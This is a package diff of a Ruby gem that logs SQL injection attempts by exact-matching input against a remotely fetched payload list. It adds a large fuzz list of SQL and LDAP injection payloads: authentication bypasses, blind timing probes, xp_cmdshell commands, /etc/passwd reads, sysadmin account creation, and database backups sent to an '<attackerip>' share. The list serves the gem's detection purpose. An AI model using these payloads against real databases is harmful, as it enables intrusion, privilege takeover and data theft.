security-gem 0.1.0 → 0.1.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/.gitignore +2 -1
- data/Gemfile.lock +1 -1
- data/lib/security/gem/builder.rb +12 -6
- data/lib/security/gem/version.rb +1 -1
- data/lib/security/gem.rb +0 -5
- data/lib/security/test.rb +7 -0
- data/payloads.txt +554 -7
- metadata +3 -2
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 1e19b4ce5337fef141ece0c5db7d4b76031f6171065a9fee2ff1444692b3c2de
|
|
4
|
+
data.tar.gz: 85b6afc1258a32aa7ce7c61a8b465384630bb0838122b6d2d19e2cd2a270c5ae
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: b3f5b0d39f1b9f2a88f8a573881dad6e2cc265706e2fad78501c2d338f3cd431c9886f5ac60c8fd70af55aca6fc28aff5ac5c458d86512f2b3c6ba053ca003c8
|
|
7
|
+
data.tar.gz: 1a8a91cc11c917bf651c8675f90a16db7c5833ce9830eb8424647ea67095ce6f7089dd631cf7c6e0239be8f470a42dd8ce7072ebb31becb7e6cb47bf173558f1
|
data/.gitignore
CHANGED
data/Gemfile.lock
CHANGED
data/lib/security/gem/builder.rb
CHANGED
|
@@ -1,15 +1,17 @@
|
|
|
1
1
|
require 'json'
|
|
2
2
|
require 'logger'
|
|
3
3
|
require 'logger/formatter'
|
|
4
|
+
require 'net/http'
|
|
4
5
|
require 'open-uri'
|
|
5
|
-
|
|
6
|
+
require 'dotenv'
|
|
7
|
+
Dotenv.load
|
|
6
8
|
|
|
7
9
|
module SecurityLogger
|
|
8
10
|
|
|
9
11
|
#Create logs used for SQL Injection detections
|
|
10
12
|
class Sql_Injection
|
|
11
|
-
def initialize
|
|
12
|
-
|
|
13
|
+
def initialize (ip_origin:)
|
|
14
|
+
@ip_origin = ip_origin
|
|
13
15
|
end
|
|
14
16
|
|
|
15
17
|
def log(input)
|
|
@@ -23,17 +25,21 @@ module SecurityLogger
|
|
|
23
25
|
}.to_json + $/
|
|
24
26
|
end
|
|
25
27
|
|
|
26
|
-
error = {:input => input}
|
|
28
|
+
error = {:input => input, :ip_origin => @ip_origin}
|
|
27
29
|
logger.warn(JSON.parse(error.to_json))
|
|
28
30
|
end
|
|
29
31
|
|
|
30
32
|
def check_input(input)
|
|
31
|
-
|
|
33
|
+
uri = ENV['PATH_TO_PAYLOAD']
|
|
34
|
+
uri = URI(uri)
|
|
35
|
+
file = Net::HTTP.get(uri)
|
|
36
|
+
file.each_line do |file|
|
|
32
37
|
if file.strip == input.strip
|
|
33
38
|
self.log(input.strip)
|
|
34
39
|
break
|
|
35
40
|
end
|
|
36
|
-
|
|
41
|
+
end
|
|
42
|
+
|
|
37
43
|
end
|
|
38
44
|
end
|
|
39
45
|
end
|
data/lib/security/gem/version.rb
CHANGED
data/lib/security/gem.rb
CHANGED
data/payloads.txt
CHANGED
|
@@ -36,8 +36,6 @@ fake@ema'or'il.nl'='il.nl
|
|
|
36
36
|
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
|
|
37
37
|
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
|
|
38
38
|
1 uni/**/on select all from where
|
|
39
|
-
|
|
40
|
-
|
|
41
39
|
true, $where: '1 == 1'
|
|
42
40
|
, $where: '1 == 1'
|
|
43
41
|
$where: '1 == 1'
|
|
@@ -59,8 +57,6 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
|
|
59
57
|
';sleep(5000);'
|
|
60
58
|
';sleep(5000);+'
|
|
61
59
|
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|
|
62
|
-
|
|
63
|
-
|
|
64
60
|
’ or ‘1’=’1
|
|
65
61
|
' or '1'='1
|
|
66
62
|
'||utl_http.request('httP://192.168.1.1/')||'
|
|
@@ -308,6 +304,7 @@ x' AND userid IS NULL; --
|
|
|
308
304
|
x' or 1=1 or 'x'='y
|
|
309
305
|
x' OR full_name LIKE '%Bob%
|
|
310
306
|
ý or 1=1 --
|
|
307
|
+
|
|
311
308
|
sleep(__TIME__)#
|
|
312
309
|
1 or sleep(__TIME__)#
|
|
313
310
|
" or sleep(__TIME__)#
|
|
@@ -339,8 +336,6 @@ benchmark(10000000,MD5(1))#
|
|
|
339
336
|
1)) or benchmark(10000000,MD5(1))#
|
|
340
337
|
")) or benchmark(10000000,MD5(1))#
|
|
341
338
|
')) or benchmark(10000000,MD5(1))#
|
|
342
|
-
|
|
343
|
-
|
|
344
339
|
OR 1=1
|
|
345
340
|
OR 1=0
|
|
346
341
|
OR x=x
|
|
@@ -853,7 +848,7 @@ RANDOMBLOB(1000000000/2)
|
|
|
853
848
|
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
|
|
854
849
|
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
|
|
855
850
|
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
|
856
|
-
ORDER BY SLEEP(5)
|
|
851
|
+
ORDER BY SLEEP(5)
|
|
857
852
|
ORDER BY 1,SLEEP(5)
|
|
858
853
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
|
|
859
854
|
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
|
|
@@ -1277,3 +1272,555 @@ ORDER BY SLEEP(5)
|
|
|
1277
1272
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
|
|
1278
1273
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
|
|
1279
1274
|
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
|
|
1275
|
+
'-'
|
|
1276
|
+
' '
|
|
1277
|
+
'&'
|
|
1278
|
+
'^'
|
|
1279
|
+
'*'
|
|
1280
|
+
' or ''-'
|
|
1281
|
+
' or '' '
|
|
1282
|
+
' or ''&'
|
|
1283
|
+
' or ''^'
|
|
1284
|
+
' or ''*'
|
|
1285
|
+
"-"
|
|
1286
|
+
" "
|
|
1287
|
+
"&"
|
|
1288
|
+
"^"
|
|
1289
|
+
"*"
|
|
1290
|
+
" or ""-"
|
|
1291
|
+
" or "" "
|
|
1292
|
+
" or ""&"
|
|
1293
|
+
" or ""^"
|
|
1294
|
+
" or ""*"
|
|
1295
|
+
or true--
|
|
1296
|
+
" or true--
|
|
1297
|
+
' or true--
|
|
1298
|
+
") or true--
|
|
1299
|
+
') or true--
|
|
1300
|
+
' or 'x'='x
|
|
1301
|
+
') or ('x')=('x
|
|
1302
|
+
')) or (('x'))=(('x
|
|
1303
|
+
" or "x"="x
|
|
1304
|
+
") or ("x")=("x
|
|
1305
|
+
")) or (("x"))=(("x
|
|
1306
|
+
or 1=1
|
|
1307
|
+
or 1=1--
|
|
1308
|
+
or 1=1#
|
|
1309
|
+
or 1=1/*
|
|
1310
|
+
admin' --
|
|
1311
|
+
admin' #
|
|
1312
|
+
admin'/*
|
|
1313
|
+
admin' or '1'='1
|
|
1314
|
+
admin' or '1'='1'--
|
|
1315
|
+
admin' or '1'='1'#
|
|
1316
|
+
admin' or '1'='1'/*
|
|
1317
|
+
admin'or 1=1 or ''='
|
|
1318
|
+
admin' or 1=1
|
|
1319
|
+
admin' or 1=1--
|
|
1320
|
+
admin' or 1=1#
|
|
1321
|
+
admin' or 1=1/*
|
|
1322
|
+
admin') or ('1'='1
|
|
1323
|
+
admin') or ('1'='1'--
|
|
1324
|
+
admin') or ('1'='1'#
|
|
1325
|
+
admin') or ('1'='1'/*
|
|
1326
|
+
admin') or '1'='1
|
|
1327
|
+
admin') or '1'='1'--
|
|
1328
|
+
admin') or '1'='1'#
|
|
1329
|
+
admin') or '1'='1'/*
|
|
1330
|
+
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
1331
|
+
admin" --
|
|
1332
|
+
admin" #
|
|
1333
|
+
admin"/*
|
|
1334
|
+
admin" or "1"="1
|
|
1335
|
+
admin" or "1"="1"--
|
|
1336
|
+
admin" or "1"="1"#
|
|
1337
|
+
admin" or "1"="1"/*
|
|
1338
|
+
admin"or 1=1 or ""="
|
|
1339
|
+
admin" or 1=1
|
|
1340
|
+
admin" or 1=1--
|
|
1341
|
+
admin" or 1=1#
|
|
1342
|
+
admin" or 1=1/*
|
|
1343
|
+
admin") or ("1"="1
|
|
1344
|
+
admin") or ("1"="1"--
|
|
1345
|
+
admin") or ("1"="1"#
|
|
1346
|
+
admin") or ("1"="1"/*
|
|
1347
|
+
admin") or "1"="1
|
|
1348
|
+
admin") or "1"="1"--
|
|
1349
|
+
admin") or "1"="1"#
|
|
1350
|
+
admin") or "1"="1"/*
|
|
1351
|
+
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
1352
|
+
==
|
|
1353
|
+
=
|
|
1354
|
+
'
|
|
1355
|
+
' --
|
|
1356
|
+
' #
|
|
1357
|
+
' –
|
|
1358
|
+
'--
|
|
1359
|
+
'/*
|
|
1360
|
+
'#
|
|
1361
|
+
" --
|
|
1362
|
+
" #
|
|
1363
|
+
"/*
|
|
1364
|
+
' and 1='1
|
|
1365
|
+
' and a='a
|
|
1366
|
+
or 1=1
|
|
1367
|
+
or true
|
|
1368
|
+
' or ''='
|
|
1369
|
+
" or ""="
|
|
1370
|
+
1′) and '1′='1–
|
|
1371
|
+
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
1372
|
+
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
1373
|
+
and 1=1
|
|
1374
|
+
and 1=1–
|
|
1375
|
+
' and 'one'='one
|
|
1376
|
+
' and 'one'='one–
|
|
1377
|
+
' group by password having 1=1--
|
|
1378
|
+
' group by userid having 1=1--
|
|
1379
|
+
' group by username having 1=1--
|
|
1380
|
+
like '%'
|
|
1381
|
+
or 0=0 --
|
|
1382
|
+
or 0=0 #
|
|
1383
|
+
or 0=0 –
|
|
1384
|
+
' or 0=0 #
|
|
1385
|
+
' or 0=0 --
|
|
1386
|
+
' or 0=0 #
|
|
1387
|
+
' or 0=0 –
|
|
1388
|
+
" or 0=0 --
|
|
1389
|
+
" or 0=0 #
|
|
1390
|
+
" or 0=0 –
|
|
1391
|
+
%' or '0'='0
|
|
1392
|
+
or 1=1
|
|
1393
|
+
or 1=1--
|
|
1394
|
+
or 1=1/*
|
|
1395
|
+
or 1=1#
|
|
1396
|
+
or 1=1–
|
|
1397
|
+
' or 1=1--
|
|
1398
|
+
' or '1'='1
|
|
1399
|
+
' or '1'='1'--
|
|
1400
|
+
' or '1'='1'/*
|
|
1401
|
+
' or '1'='1'#
|
|
1402
|
+
' or '1′='1
|
|
1403
|
+
' or 1=1
|
|
1404
|
+
' or 1=1 --
|
|
1405
|
+
' or 1=1 –
|
|
1406
|
+
' or 1=1--
|
|
1407
|
+
' or 1=1;#
|
|
1408
|
+
' or 1=1/*
|
|
1409
|
+
' or 1=1#
|
|
1410
|
+
' or 1=1–
|
|
1411
|
+
') or '1'='1
|
|
1412
|
+
') or '1'='1--
|
|
1413
|
+
') or '1'='1'--
|
|
1414
|
+
') or '1'='1'/*
|
|
1415
|
+
') or '1'='1'#
|
|
1416
|
+
') or ('1'='1
|
|
1417
|
+
') or ('1'='1--
|
|
1418
|
+
') or ('1'='1'--
|
|
1419
|
+
') or ('1'='1'/*
|
|
1420
|
+
') or ('1'='1'#
|
|
1421
|
+
'or'1=1
|
|
1422
|
+
'or'1=1′
|
|
1423
|
+
" or "1"="1
|
|
1424
|
+
" or "1"="1"--
|
|
1425
|
+
" or "1"="1"/*
|
|
1426
|
+
" or "1"="1"#
|
|
1427
|
+
" or 1=1
|
|
1428
|
+
" or 1=1 --
|
|
1429
|
+
" or 1=1 –
|
|
1430
|
+
" or 1=1--
|
|
1431
|
+
" or 1=1/*
|
|
1432
|
+
" or 1=1#
|
|
1433
|
+
" or 1=1–
|
|
1434
|
+
") or "1"="1
|
|
1435
|
+
") or "1"="1"--
|
|
1436
|
+
") or "1"="1"/*
|
|
1437
|
+
") or "1"="1"#
|
|
1438
|
+
") or ("1"="1
|
|
1439
|
+
") or ("1"="1"--
|
|
1440
|
+
") or ("1"="1"/*
|
|
1441
|
+
") or ("1"="1"#
|
|
1442
|
+
) or '1′='1–
|
|
1443
|
+
) or ('1′='1–
|
|
1444
|
+
' or 1=1 LIMIT 1;#
|
|
1445
|
+
'or 1=1 or ''='
|
|
1446
|
+
"or 1=1 or ""="
|
|
1447
|
+
' or 'a'='a
|
|
1448
|
+
' or a=a--
|
|
1449
|
+
' or a=a–
|
|
1450
|
+
') or ('a'='a
|
|
1451
|
+
" or "a"="a
|
|
1452
|
+
") or ("a"="a
|
|
1453
|
+
') or ('a'='a and hi") or ("a"="a
|
|
1454
|
+
' or 'one'='one
|
|
1455
|
+
' or 'one'='one–
|
|
1456
|
+
' or uid like '%
|
|
1457
|
+
' or uname like '%
|
|
1458
|
+
' or userid like '%
|
|
1459
|
+
' or user like '%
|
|
1460
|
+
' or username like '%
|
|
1461
|
+
' or 'x'='x
|
|
1462
|
+
') or ('x'='x
|
|
1463
|
+
" or "x"="x
|
|
1464
|
+
' OR 'x'='x'#;
|
|
1465
|
+
'=' 'or' and '=' 'or'
|
|
1466
|
+
' UNION ALL SELECT 1, @@version;#
|
|
1467
|
+
' UNION ALL SELECT system_user(),user();#
|
|
1468
|
+
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
1469
|
+
admin' and substring(password/text(),1,1)='7
|
|
1470
|
+
' and substring(password/text(),1,1)='7
|
|
1471
|
+
' or 1=1 limit 1 -- -+
|
|
1472
|
+
'="or'
|
|
1473
|
+
select version();
|
|
1474
|
+
select current_database();
|
|
1475
|
+
select current_user;
|
|
1476
|
+
select session_user;
|
|
1477
|
+
select current_setting('log_connections');
|
|
1478
|
+
select current_setting('log_statement');
|
|
1479
|
+
select current_setting('port');
|
|
1480
|
+
select current_setting('password_encryption');
|
|
1481
|
+
select current_setting('krb_server_keyfile');
|
|
1482
|
+
select current_setting('virtual_host');
|
|
1483
|
+
select current_setting('port');
|
|
1484
|
+
select current_setting('config_file');
|
|
1485
|
+
select current_setting('hba_file');
|
|
1486
|
+
select current_setting('data_directory');
|
|
1487
|
+
select * from pg_shadow;
|
|
1488
|
+
select * from pg_group;
|
|
1489
|
+
create table myfile (input TEXT);
|
|
1490
|
+
copy myfile from '/etc/passwd';
|
|
1491
|
+
select * from myfile;copy myfile to /tmp/test;
|
|
1492
|
+
<username>' OR 1=1--
|
|
1493
|
+
'OR '' = ' Allows authentication without a valid username.
|
|
1494
|
+
<username>'--
|
|
1495
|
+
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
|
|
1496
|
+
'OR 1=1--
|
|
1497
|
+
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|
|
1498
|
+
select @@version
|
|
1499
|
+
select @@servernamee
|
|
1500
|
+
select @@microsoftversione
|
|
1501
|
+
select * from master..sysserverse
|
|
1502
|
+
select * from sysusers
|
|
1503
|
+
exec master..xp_cmdshell 'ipconfig+/all'
|
|
1504
|
+
exec master..xp_cmdshell 'net+view'
|
|
1505
|
+
exec master..xp_cmdshell 'net+users'
|
|
1506
|
+
exec master..xp_cmdshell 'ping+<attackerip>'
|
|
1507
|
+
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
|
|
1508
|
+
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp�'" select * from myfile"--
|
|
1509
|
+
select versionnumber, version_timestamp from sysibm.sysversions;
|
|
1510
|
+
select user from sysibm.sysdummy1;
|
|
1511
|
+
select session_user from sysibm.sysdummy1;
|
|
1512
|
+
select system_user from sysibm.sysdummy1;
|
|
1513
|
+
select current server from sysibm.sysdummy1;
|
|
1514
|
+
select name from sysibm.systables;
|
|
1515
|
+
select grantee from syscat.dbauth;
|
|
1516
|
+
select * from syscat.tabauth;
|
|
1517
|
+
select * from syscat.dbauth where grantee = current user;
|
|
1518
|
+
select * from syscat.tabauth where grantee = current user;
|
|
1519
|
+
select name, tbname, coltype from sysibm.syscolumns;
|
|
1520
|
+
SELECT schemaname FROM syscat.schemata;
|
|
1521
|
+
# ms-sqli info disclosure payload fuzzfile
|
|
1522
|
+
# replace regex with your fuzzer for best results <attackerip> <sharename>
|
|
1523
|
+
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
|
|
1524
|
+
# might need to terminate payloads with ;--
|
|
1525
|
+
select @@version
|
|
1526
|
+
select @@servernamee
|
|
1527
|
+
select @@microsoftversione
|
|
1528
|
+
select * from master..sysserverse
|
|
1529
|
+
select * from sysusers
|
|
1530
|
+
exec master..xp_cmdshell 'ipconfig+/all'
|
|
1531
|
+
exec master..xp_cmdshell 'net+view'
|
|
1532
|
+
exec master..xp_cmdshell 'net+users'
|
|
1533
|
+
exec master..xp_cmdshell 'ping+<attackerip>'
|
|
1534
|
+
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
|
|
1535
|
+
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
|
|
1536
|
+
# you will need to customize/modify some of the vaules in the queries for best effect
|
|
1537
|
+
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
|
1538
|
+
'create user name identified by 'pass123' --
|
|
1539
|
+
'create user name identified by pass123 temporary tablespace temp default tablespace users;
|
|
1540
|
+
' ; drop table temp --
|
|
1541
|
+
'exec sp_addlogin 'name' , 'password' --
|
|
1542
|
+
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
|
|
1543
|
+
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
|
|
1544
|
+
' grant connect to name; grant resource to name; --
|
|
1545
|
+
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
|
|
1546
|
+
' or 1=1 --
|
|
1547
|
+
' union (select @@version) --
|
|
1548
|
+
' union (select NULL, (select @@version)) --
|
|
1549
|
+
' union (select NULL, NULL, (select @@version)) --
|
|
1550
|
+
' union (select NULL, NULL, NULL, (select @@version)) --
|
|
1551
|
+
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
|
|
1552
|
+
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
|
|
1553
|
+
1'1
|
|
1554
|
+
1 exec sp_ (or exec xp_)
|
|
1555
|
+
1 and 1=1
|
|
1556
|
+
1' and 1=(select count(*) from tablenames); --
|
|
1557
|
+
1 or 1=1
|
|
1558
|
+
1' or '1'='1
|
|
1559
|
+
|
|
1560
|
+
)%20or%20('x'='x
|
|
1561
|
+
%20or%201=1
|
|
1562
|
+
; execute immediate 'sel' || 'ect us' || 'er'
|
|
1563
|
+
benchmark(10000000,MD5(1))#
|
|
1564
|
+
update
|
|
1565
|
+
";waitfor delay '0:0:__TIME__'--
|
|
1566
|
+
1) or pg_sleep(__TIME__)--
|
|
1567
|
+
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
|
|
1568
|
+
"hi"") or (""a""=""a"
|
|
1569
|
+
delete
|
|
1570
|
+
like
|
|
1571
|
+
" or sleep(__TIME__)#
|
|
1572
|
+
pg_sleep(__TIME__)--
|
|
1573
|
+
*(|(objectclass=*))
|
|
1574
|
+
declare @q nvarchar (200) 0x730065006c00650063 ...
|
|
1575
|
+
or 0=0 #
|
|
1576
|
+
insert
|
|
1577
|
+
1) or sleep(__TIME__)#
|
|
1578
|
+
) or ('a'='a
|
|
1579
|
+
; exec xp_regread
|
|
1580
|
+
*|
|
|
1581
|
+
@var select @var as var into temp end --
|
|
1582
|
+
1)) or benchmark(10000000,MD5(1))#
|
|
1583
|
+
asc
|
|
1584
|
+
(||6)
|
|
1585
|
+
"a"" or 3=3--"
|
|
1586
|
+
" or benchmark(10000000,MD5(1))#
|
|
1587
|
+
# from wapiti
|
|
1588
|
+
or 0=0 --
|
|
1589
|
+
1 waitfor delay '0:0:10'--
|
|
1590
|
+
or 'a'='a
|
|
1591
|
+
hi or 1=1 --"
|
|
1592
|
+
or a = a
|
|
1593
|
+
UNION ALL SELECT
|
|
1594
|
+
) or sleep(__TIME__)='
|
|
1595
|
+
)) or benchmark(10000000,MD5(1))#
|
|
1596
|
+
hi' or 'a'='a
|
|
1597
|
+
0
|
|
1598
|
+
21 %
|
|
1599
|
+
limit
|
|
1600
|
+
or 1=1
|
|
1601
|
+
or 2 > 1
|
|
1602
|
+
")) or benchmark(10000000,MD5(1))#
|
|
1603
|
+
PRINT
|
|
1604
|
+
hi') or ('a'='a
|
|
1605
|
+
or 3=3
|
|
1606
|
+
));waitfor delay '0:0:__TIME__'--
|
|
1607
|
+
a' waitfor delay '0:0:10'--
|
|
1608
|
+
1;(load_file(char(47,101,116,99,47,112,97,115, ...
|
|
1609
|
+
or%201=1
|
|
1610
|
+
1 or sleep(__TIME__)#
|
|
1611
|
+
or 1=1
|
|
1612
|
+
and 1 in (select var from temp)--
|
|
1613
|
+
or '7659'='7659
|
|
1614
|
+
or 'text' = n'text'
|
|
1615
|
+
--
|
|
1616
|
+
or 1=1 or ''='
|
|
1617
|
+
declare @s varchar (200) select @s = 0x73656c6 ...
|
|
1618
|
+
exec xp
|
|
1619
|
+
; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
|
1620
|
+
3.10E+17
|
|
1621
|
+
" or pg_sleep(__TIME__)--
|
|
1622
|
+
x' AND email IS NULL; --
|
|
1623
|
+
&
|
|
1624
|
+
admin' or '
|
|
1625
|
+
or 'unusual' = 'unusual'
|
|
1626
|
+
//
|
|
1627
|
+
truncate
|
|
1628
|
+
1) or benchmark(10000000,MD5(1))#
|
|
1629
|
+
\x27UNION SELECT
|
|
1630
|
+
declare @s varchar(200) select @s = 0x77616974 ...
|
|
1631
|
+
tz_offset
|
|
1632
|
+
sqlvuln
|
|
1633
|
+
"));waitfor delay '0:0:__TIME__'--
|
|
1634
|
+
||6
|
|
1635
|
+
or%201=1 --
|
|
1636
|
+
%2A%28%7C%28objectclass%3D%2A%29%29
|
|
1637
|
+
or a=a
|
|
1638
|
+
) union select * from information_schema.tables;
|
|
1639
|
+
PRINT @@variable
|
|
1640
|
+
or isNULL(1/0) /*
|
|
1641
|
+
26 %
|
|
1642
|
+
" or "a"="a
|
|
1643
|
+
(sqlvuln)
|
|
1644
|
+
x' AND members.email IS NULL; --
|
|
1645
|
+
or 1=1--
|
|
1646
|
+
and 1=( if((load_file(char(110,46,101,120,11 ...
|
|
1647
|
+
0x770061006900740066006F0072002000640065006C00 ...
|
|
1648
|
+
%20'sleep%2050'
|
|
1649
|
+
as
|
|
1650
|
+
1)) or pg_sleep(__TIME__)--
|
|
1651
|
+
/**/or/**/1/**/=/**/1
|
|
1652
|
+
union all select @@version--
|
|
1653
|
+
,@variable
|
|
1654
|
+
(sqlattempt2)
|
|
1655
|
+
or (EXISTS)
|
|
1656
|
+
t'exec master..xp_cmdshell 'nslookup www.googl ...
|
|
1657
|
+
%20$(sleep%2050)
|
|
1658
|
+
1 or benchmark(10000000,MD5(1))#
|
|
1659
|
+
%20or%20''='
|
|
1660
|
+
||UTL_HTTP.REQUEST
|
|
1661
|
+
or pg_sleep(__TIME__)--
|
|
1662
|
+
hi' or 'x'='x';
|
|
1663
|
+
") or sleep(__TIME__)="
|
|
1664
|
+
or 'whatever' in ('whatever')
|
|
1665
|
+
; begin declare @var varchar(8000) set @var=' ...
|
|
1666
|
+
union select 1,load_file('/etc/passwd'),1,1,1;
|
|
1667
|
+
0x77616974666F722064656C61792027303A303A313027 ...
|
|
1668
|
+
exec(@s)
|
|
1669
|
+
) or pg_sleep(__TIME__)--
|
|
1670
|
+
union select
|
|
1671
|
+
or sleep(__TIME__)#
|
|
1672
|
+
select * from information_schema.tables--
|
|
1673
|
+
a' or 1=1--
|
|
1674
|
+
a' or 'a' = 'a
|
|
1675
|
+
declare @s varchar(22) select @s =
|
|
1676
|
+
or 2 between 1 and 3
|
|
1677
|
+
or a=a--
|
|
1678
|
+
or '1'='1
|
|
1679
|
+
|
|
|
1680
|
+
or sleep(__TIME__)='
|
|
1681
|
+
or 1 --'
|
|
1682
|
+
or 0=0 #"
|
|
1683
|
+
having
|
|
1684
|
+
a'
|
|
1685
|
+
" or isNULL(1/0) /*
|
|
1686
|
+
declare @s varchar (8000) select @s = 0x73656c ...
|
|
1687
|
+
â or 1=1 --
|
|
1688
|
+
char%4039%41%2b%40SELECT
|
|
1689
|
+
order by
|
|
1690
|
+
bfilename
|
|
1691
|
+
having 1=1--
|
|
1692
|
+
) or benchmark(10000000,MD5(1))#
|
|
1693
|
+
or username like char(37);
|
|
1694
|
+
;waitfor delay '0:0:__TIME__'--
|
|
1695
|
+
" or 1=1--
|
|
1696
|
+
x' AND userid IS NULL; --
|
|
1697
|
+
*/*
|
|
1698
|
+
or 'text' > 't'
|
|
1699
|
+
(select top 1
|
|
1700
|
+
or benchmark(10000000,MD5(1))#
|
|
1701
|
+
");waitfor delay '0:0:__TIME__'--
|
|
1702
|
+
a' or 3=3--
|
|
1703
|
+
-- &password=
|
|
1704
|
+
group by userid having 1=1--
|
|
1705
|
+
or ''='
|
|
1706
|
+
; exec master..xp_cmdshell
|
|
1707
|
+
%20or%20x=x
|
|
1708
|
+
select
|
|
1709
|
+
")) or sleep(__TIME__)="
|
|
1710
|
+
0x730065006c0065006300740020004000400076006500 ...
|
|
1711
|
+
hi' or 1=1 --
|
|
1712
|
+
") or pg_sleep(__TIME__)--
|
|
1713
|
+
%20or%20'x'='x
|
|
1714
|
+
or 'something' = 'some'+'thing'
|
|
1715
|
+
exec sp
|
|
1716
|
+
29 %
|
|
1717
|
+
(
|
|
1718
|
+
ý or 1=1 --
|
|
1719
|
+
1 or pg_sleep(__TIME__)--
|
|
1720
|
+
0 or 1=1
|
|
1721
|
+
) or (a=a
|
|
1722
|
+
uni/**/on sel/**/ect
|
|
1723
|
+
replace
|
|
1724
|
+
%27%20or%201=1
|
|
1725
|
+
)) or pg_sleep(__TIME__)--
|
|
1726
|
+
%7C
|
|
1727
|
+
x' AND 1=(SELECT COUNT(*) FROM tabname); --
|
|
1728
|
+
'%20OR
|
|
1729
|
+
; or '1'='1'
|
|
1730
|
+
declare @q nvarchar (200) select @q = 0x770061 ...
|
|
1731
|
+
1 or 1=1
|
|
1732
|
+
; exec ('sel' + 'ect us' + 'er')
|
|
1733
|
+
23 OR 1=1
|
|
1734
|
+
/
|
|
1735
|
+
anything' OR 'x'='x
|
|
1736
|
+
declare @q nvarchar (4000) select @q =
|
|
1737
|
+
or 0=0 --
|
|
1738
|
+
desc
|
|
1739
|
+
||'6
|
|
1740
|
+
)
|
|
1741
|
+
1)) or sleep(__TIME__)#
|
|
1742
|
+
or 0=0 #
|
|
1743
|
+
select name from syscolumns where id = (sele ...
|
|
1744
|
+
hi or a=a
|
|
1745
|
+
*(|(mail=*))
|
|
1746
|
+
password:*/=1--
|
|
1747
|
+
distinct
|
|
1748
|
+
);waitfor delay '0:0:__TIME__'--
|
|
1749
|
+
to_timestamp_tz
|
|
1750
|
+
") or benchmark(10000000,MD5(1))#
|
|
1751
|
+
UNION SELECT
|
|
1752
|
+
%2A%28%7C%28mail%3D%2A%29%29
|
|
1753
|
+
+sqlvuln
|
|
1754
|
+
or 1=1 /*
|
|
1755
|
+
)) or sleep(__TIME__)='
|
|
1756
|
+
or 1=1 or ""=
|
|
1757
|
+
or 1 in (select @@version)--
|
|
1758
|
+
sqlvuln;
|
|
1759
|
+
union select * from users where login = char ...
|
|
1760
|
+
x' or 1=1 or 'x'='y
|
|
1761
|
+
28 %
|
|
1762
|
+
â or 3=3 --
|
|
1763
|
+
@variable
|
|
1764
|
+
or '1'='1'--
|
|
1765
|
+
"a"" or 1=1--"
|
|
1766
|
+
//*
|
|
1767
|
+
%2A%7C
|
|
1768
|
+
" or 0=0 --
|
|
1769
|
+
")) or pg_sleep(__TIME__)--
|
|
1770
|
+
?
|
|
1771
|
+
or 1/*
|
|
1772
|
+
!
|
|
1773
|
+
'
|
|
1774
|
+
or a = a
|
|
1775
|
+
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
|
|
1776
|
+
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
|
1777
|
+
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
|
1778
|
+
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
|
|
1779
|
+
' or 1=1
|
|
1780
|
+
or 1=1 --
|
|
1781
|
+
x' OR full_name LIKE '%Bob%
|
|
1782
|
+
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
|
1783
|
+
'%20or%20''='
|
|
1784
|
+
